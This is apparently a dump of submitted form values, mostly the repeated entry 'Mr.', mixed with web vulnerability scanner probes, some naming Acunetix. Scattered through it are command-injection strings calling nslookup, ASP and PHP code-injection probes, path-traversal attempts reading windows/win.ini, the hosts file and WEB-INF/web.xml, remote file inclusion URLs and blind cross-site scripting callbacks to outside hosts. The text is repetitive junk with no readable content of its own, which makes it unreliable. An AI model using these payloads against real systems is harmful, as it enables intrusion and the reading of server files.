Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
$(nslookup 54iEJbuj)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
&nslookup XnMIhkRT&'\"`0&nslookup XnMIhkRT&`'
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
"+response.write(9482580*9030469)+"
-
set|set&set
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
"+response.write(9257423*9455847)+"
-
Mr.
-
Mr.
-
&nslookup fWrDHIJ0&'\"`0&nslookup fWrDHIJ0&`'
-
Mr.
-
Mr.
-
Mr.
-
$(nslookup uRY0tV2Z)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
set|set&set
-
Mr.
-
Mr.
-
Mr.
-
'+response.write(9257423*9455847)+'
-
Mr.
-
Mr.
-
response.write(9257423*9455847)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
12345'"\'\");|]*
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
12345'"\'\");|]*
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
^(#$!@#$)(()))******
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
^(#$!@#$)(()))******
-
!(()&&!|*|*|
-
Mr.
-
!(()&&!|*|*|
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
'+response.write(9482580*9030469)+'
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
response.write(9482580*9030469)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
'"()
-
Mr.
-
Mr.
-
http://testasp.vulnweb.com/t/xss.html?%00.jpg
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://testasp.vulnweb.com/t/xss.html?%00.jpg
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
'"()
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://testasp.vulnweb.com/t/fit.txt?.
-
Mr.
-
Mr.
-
Mr.
-
testasp.vulnweb.com
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://testasp.vulnweb.com/t/fit.txt?.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
testasp.vulnweb.com
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Http://testasp.vulnweb.com/t/fit.txt
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
1some_inexistent_file_with_long_name
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
-
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
/www.vulnweb.com
-
${@print(md5(acunetix_wvs_security_test))}\
-
${@print(md5(acunetix_wvs_security_test))}
-
Mr.
-
/www.vulnweb.com
-
";print(md5(acunetix_wvs_security_test));$a="
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp/.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp
-
Mr.
-
Mr.
-
Mr.
-
';print(md5(acunetix_wvs_security_test));$a='
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp
-
Mr.
-
Mr.
-
Mr.
-
${@print(md5(acunetix_wvs_security_test))}
-
Mr.
-
";print(md5(acunetix_wvs_security_test));$a="
-
';print(md5(acunetix_wvs_security_test));$a='
-
Mr.
-
Mr.
-
;print(md5(acunetix_wvs_security_test));
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
;print(md5(acunetix_wvs_security_test));
-
Mr.
-
Mr.
-
Mr.
-
${@print(md5(acunetix_wvs_security_test))}\
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
12345'"\'\");|]*
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
^(#$!@#$)(()))******
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
!(()&&!|*|*|
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
12345'"\'\");|]*
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Http://testasp.vulnweb.com/t/fit.txt
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
1some_inexistent_file_with_long_name
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://hitBvD7zqpVsV.bxss.me/
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://hitgqtEUBuGSk.bxss.me/
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
-
�'�"
-
JyI=
-
@@OhbyK
-
1
-
WEB-INF\web.xml
-
\
-
WEB-INF/web.xml
-
1'"
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-
Mr.
-
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-
..\..\..\..\..\..\..\..\windows\win.ini
-
................windowswin.ini
-
������������������������������������������������windows��win.ini
-
../../../../../../../../../../windows/win.ini
-
C:\WINDOWS\system32\drivers\etc\hosts
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
�''�""
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
�'�"
-
Mr.
-
Mr.
-
../../../../../../../../../../windows/win.ini
-
../../../../../../../../../../windows/win.ini
-
Mr.
-
C:\WINDOWS\system32\drivers\etc\hosts
-
Mr.
-
../../../../../../../../../../windows/win.ini
-
Mr.
-
Mr.
-
Mr.
-
������������������������������������������������windows��win.ini
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
JyI=
-
@@MHfk8
-
1
-
\
-
1'"
-
Mr.
-
WEB-INF\web.xml
-
WEB-INF/web.xml
-
Mr.
-
-
�''�""
-
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
-
Mr.
-
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-
Mr.
-
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-
Mr.
-
..\..\..\..\..\..\..\..\windows\win.ini
-
Mr.
-
................windowswin.ini
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-